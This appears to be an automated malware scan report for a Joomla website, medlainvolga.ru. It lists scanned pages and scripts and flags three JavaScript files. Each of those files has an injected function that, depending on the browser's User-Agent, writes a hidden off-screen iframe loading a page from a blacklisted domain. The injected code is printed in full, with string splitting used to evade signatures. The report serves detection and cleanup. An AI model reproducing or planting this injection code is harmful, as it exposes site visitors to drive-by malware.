Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=medlainvolga.ru
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.medlainvolga.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 03:11:21 GMT Location: http://medlainvolga.ru/ Server: nginx/1.4.4 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 896c205cb4cbdeaa040e013f7c483b89=oq8nre9lvvknbdsng7hu92ibk1; path=/ X-Powered-By: PHP/5.2.17-pl0-gentoo | clean |
http://medlainvolga.ru/ | 200 OK Content-Length: 24152 Content-Type: text/html | clean |
http://medlainvolga.ru/media/system/js/caption.js | 200 OK Content-Length: 2610 Content-Type: application/x-javascript | malicious |
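Malicious code found. Script contains blacklisted domain: miskarow.francodisaia.com.ar
The excerpt below shows an injected function placed ahead of what appears to be the file's original JCaption code. It writes an off-screen 133x133 iframe pointing at the blacklisted domain only when the User-Agent contains none of the listed platform strings, and the split string literals ('posi'+'tion', '</ifra'+'me>') look intended to defeat simple signature matching. The scan covers only the pages and files listed in this report, so during cleanup every served script should be checked for the same prefix, not only the files flagged here.
function Teobromine() {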
var w = navigator.userAgent; var n = (w.indexOf("Android") > -1 || w.indexOf("Chrome") > -1 || w.indexOf("Linux") > -1 || w.indexOf("Macintosh") > -1 || w.indexOf("IEMobile") > -1 || w.indexOf("FreeBSD") > -1 || w.indexOf("iPhone") > -1 || w.indexOf("iPad") > -1); if (!n) { document.write('<iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"></ifra'+'me>'); } } Teobromine(); var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var capti ...[1142 bytes skipped]... Decoded script: <iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="position:absolute;left: -700px;top: -700px;" height="133" width="133"></iframe> Malicious iFrame found. size: 133x133 src: http://miskarow.francodisaia.com.ar/skypetros15.html This URL is marked by Google as suspicious <iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"> | ||
http://www.medlainvolga.ru/templates/yoo_air/warp/systems/joomla.1.5/js/warp.js | 200 OK Content-Length: 1552 Content-Type: application/x-javascript | clean |
http://www.medlainvolga.ru/templates/yoo_air/warp/systems/joomla.1.5/js/accordionmenu.js | 200 OK Content-Length: 1212 Content-Type: application/x-javascript | clean |
http://www.medlainvolga.ru/templates/yoo_air/warp/systems/joomla.1.5/js/menu.js | 200 OK Content-Length: 3942 Content-Type: application/x-javascript | clean |
http://www.medlainvolga.ru/templates/yoo_air/warp/systems/joomla.1.5/js/fancymenu.js | 200 OK Content-Length: 3117 Content-Type: application/x-javascript | clean |
http://www.medlainvolga.ru/templates/yoo_air/js/template.js | 200 OK Content-Length: 2603 Content-Type: application/x-javascript | malicious |
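Malicious code found. Script contains blacklisted domain: miskarow.francodisaia.com.ar
The same injected function appears here, ahead of what appears to be the file's original WarpTemplate code.
function Teobromine() {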
var w = navigator.userAgent; var n = (w.indexOf("Android") > -1 || w.indexOf("Chrome") > -1 || w.indexOf("Linux") > -1 || w.indexOf("Macintosh") > -1 || w.indexOf("IEMobile") > -1 || w.indexOf("FreeBSD") > -1 || w.indexOf("iPhone") > -1 || w.indexOf("iPad") > -1); if (!n) { document.write('<iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"></ifra'+'me>'); } } Teobromine(); var WarpTemplate = { start: function() { new Warp.AccordionMenu('div#middle ul.menu li.toggler', 'ul.accordion', { accordion: 'slide' }); var dropdown = new Warp.Menu('menu', { mode: 'height', duration: 300, dropdownSelector: 'div.dropdo ...[1506 bytes skipped]... Decoded script: <iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="position:absolute;left: -700px;top: -700px;" height="133" width="133"></iframe> Malicious iFrame found. size: 133x133 src: http://miskarow.francodisaia.com.ar/skypetros15.html This URL is marked by Google as suspicious <iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"> | ||
http://medlainvolga.ru/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 36788 Content-Type: application/x-javascript | malicious |
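Malicious code found. Script contains blacklisted domain: miskarow.francodisaia.com.ar
The same injected function appears here, ahead of what appears to be the file's original Shadowbox code.
function Teobromine() {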
var w = navigator.userAgent; var n = (w.indexOf("Android") > -1 || w.indexOf("Chrome") > -1 || w.indexOf("Linux") > -1 || w.indexOf("Macintosh") > -1 || w.indexOf("IEMobile") > -1 || w.indexOf("FreeBSD") > -1 || w.indexOf("iPhone") > -1 || w.indexOf("iPad") > -1); if (!n) { document.write('<iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"></ifra'+'me>'); } } Teobromine(); if(typeof MooTools=="undefined"){throw"Unable to load Shadowbox, MooTools library not found."}var Shadowbox={};Shadowbox.lib={getStyle:function(B,A){return $(B).getStyle(A)},setStyle:function(D,C,E){D=$(D);if(typeof C!="object"){var A={};A[C]=E;C=A}for(var B in C){D.setStyle ...[3307 bytes skipped]... Decoded script: <iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="position:absolute;left: -700px;top: -700px;" height="133" width="133"></iframe> Malicious iFrame found. size: 133x133 src: http://miskarow.francodisaia.com.ar/skypetros15.html This URL is marked by Google as suspicious <iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"> | ||
http://medlainvolga.ru//plugins/system/u24/lytebox/3.22/lytebox.original.js/ | 404 Not Found Content-Length: 1109 Content-Type: text/html | clean |
http://medlainvolga.ru/test404page.js | 404 Not Found Content-Length: 1109 Content-Type: text/html | clean |
http://www.medlainvolga.ru//mc.yandex.ru/metrika/watch.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 03:11:24 GMT Location: http://medlainvolga.ru//mc.yandex.ru/metrika/watch.js/ Server: nginx/1.4.4 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 896c205cb4cbdeaa040e013f7c483b89=hp2jnlkr1d79nrqtnb6uhopgq4; path=/ X-Powered-By: PHP/5.2.17-pl0-gentoo | clean |
http://medlainvolga.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 16833 Content-Type: text/html | clean |
http://medlainvolga.ru/templates/yoo_air/warp/systems/joomla.1.5/js/warp.js | 200 OK Content-Length: 1552 Content-Type: application/x-javascript | clean |
http://www.medlainvolga.ru/obuchenie | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 03:11:25 GMT Location: http://medlainvolga.ru/obuchenie Server: nginx/1.4.4 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 896c205cb4cbdeaa040e013f7c483b89=3k3fu6edbj1qfejdrse47krgs4; path=/ X-Powered-By: PHP/5.2.17-pl0-gentoo | clean |
http://medlainvolga.ru/obuchenie | 200 OK Content-Length: 23153 Content-Type: text/html | clean |
http://medlainvolga.ru/templates/yoo_air/warp/systems/joomla.1.5/js/accordionmenu.js | 200 OK Content-Length: 1212 Content-Type: application/x-javascript | clean |
http://www.medlainvolga.ru/vistavki | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 03:11:28 GMT Location: http://medlainvolga.ru/vistavki Server: nginx/1.4.4 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 896c205cb4cbdeaa040e013f7c483b89=fo5p35c9sonsd6aj3j5avqbo37; path=/ X-Powered-By: PHP/5.2.17-pl0-gentoo | clean |
http://medlainvolga.ru/vistavki | 200 OK Content-Length: 30011 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: medlainvolga.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 03:11:21 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 03:11:21 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 896c205cb4cbdeaa040e013f7c483b89=5b9bg7nqqkp4agktccpo4m6ep2; path=/
X-Powered-By: PHP/5.2.17-pl0-gentoo
GET / HTTP/1.1
Host: medlainvolga.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 03:11:21 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 03:11:21 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 896c205cb4cbdeaa040e013f7c483b89=5b9bg7nqqkp4agktccpo4m6ep2; path=/
X-Powered-By: PHP/5.2.17-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: medlainvolga.ru
Referer: http://www.google.com/search?q=medlainvolga.ru
Result:
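The result is similar to the first query. No suspicious redirects were found. This test compares only a direct visit with a search-engine-referred visit at the HTTP level; it does not exercise the client-side iframe injection reported under "Scanned pages/files", which is conditioned on the browser's User-Agent.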
GET / HTTP/1.1
Host: medlainvolga.ru
Referer: http://www.google.com/search?q=medlainvolga.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.